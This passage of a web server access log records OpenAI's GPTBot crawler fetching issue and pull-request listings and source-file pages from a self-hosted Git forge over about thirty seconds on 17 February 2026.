GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" +[17/Feb/2026:19:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21833] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" +[17/Feb/2026:19:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10087] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10093] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10262] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt?display=rendered" [Client 74.7.227.38] [Length 11263] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:19:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13567] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13567] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13534] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13567] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11311] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:19:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10093] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10089] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10264] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15408] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11266] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13568] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 